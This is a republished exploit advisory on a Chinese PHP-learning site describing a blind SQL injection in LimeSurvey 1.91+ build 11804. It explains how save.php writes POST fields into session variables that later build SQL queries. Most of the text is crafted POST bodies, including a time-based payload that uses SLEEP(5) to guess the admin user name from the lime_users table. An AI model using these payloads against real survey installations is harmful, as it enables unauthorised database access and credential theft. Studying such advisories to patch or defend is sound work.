来源:自学PHP网 时间:2015-04-17 13:03 作者: 阅读:次
[导读] 标题: LimeSurvey Blind SQL injection作者: TorTukiTu - OpenSphere影响版本: 1.91+ build 11804测试平台: php{cke_protected}{C}{cke_protected}{C}---------------------------------------------......
|
标题: LimeSurvey Blind SQL injection
作者: TorTukiTu - OpenSphere 影响版本: 1.91+ build 11804 测试平台: php {cke_protected}{C}{cke_protected}{C} ------------------------------------------------------------------------- # TorTukiTu - Killing Tortoise # ,-"""-. # oo._/ \___/ \ # (____)_/___\__\_) # /_// \\_\ # # Cookie hacking + 盲注 # The vulnerability occurs when a user answers a survey (index.php). # The session variables can be freely hacked using the following lines in save.php l.82 : # if (isset($_POST[$pf])) {$_SESSION[$pf] = $_POST[$pf];} # if (!isset($_POST[$pf])) {$_SESSION[$pf] = "";} # $pf is user input in the POST variable # once splitted, SQL request is directly build from those sessions variable by function createinsertquery(), # if a special Post variable 'srid' is set both in the variable # 'fieldnames' and as simple POST variable (query l. 715 save.php). # The user can realize blind SQL injections with specially crafted POST variables. # Normal POST variables example: www.2cto.com fieldnames=17165X6X18SQ001%7C17165X6X18SQ002%7C17165X6X18SQ003%7C17165X6X18SQ004%7C17165X6X18SQ005%7C17165X6X18SQ006%7C17165X6X18SQ007%7C17165X6X18other%7C17165X6X26SQ001%7C17165X6X26SQ002%7C17165X6X26SQ003 MULTI17165X6X18=8 tbdisp17... ... start_time=1329742665 # Craft POST variables like this : fieldnames=17165X6X18SQ001%7C17165X6X18SQ002%7C17165X6X18SQ003%7C17165X6X18SQ004%7C17165X6X18SQ005%7C17165X6X18SQ006%7C17165X6X18SQ007%7C17165X6X18other%7C17165X6X26SQ001%7C17165X6X26SQ002%7C17165X6X26SQ003%7C[VALID FIELD ID]` = [SQL INJECTION]--%7Csrid MULTI17165X6X18=8 tbdisp17... ... start_time=1329742665 srid=[SOME INTEGER] #Example : Blind SQL user name guessing : fieldnames=17165X6X18SQ001%7C17165X6X18SQ002%7C17165X6X18SQ003%7C17165X6X18SQ004%7C17165X6X18SQ005%7C17165X6X18SQ006%7C17165X6X18SQ007%7C17165X6X18other%7C17165X6X26SQ001%7C17165X6X26SQ002%7C17165X6X26SQ003%7C17165X6X18SQ001` = NULL WHERE id=6 AND id IN ( SELECT IF ( (SELECT SUBSTRING(users_name,1) FROM lime_users WHERE uid=1) LIKE 'a%', 1, SLEEP(5)))--%7Csrid MULTI17165X6X18=8 tbdisp17... ... start_time=1329742665 srid=42 ---------------------- |
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com
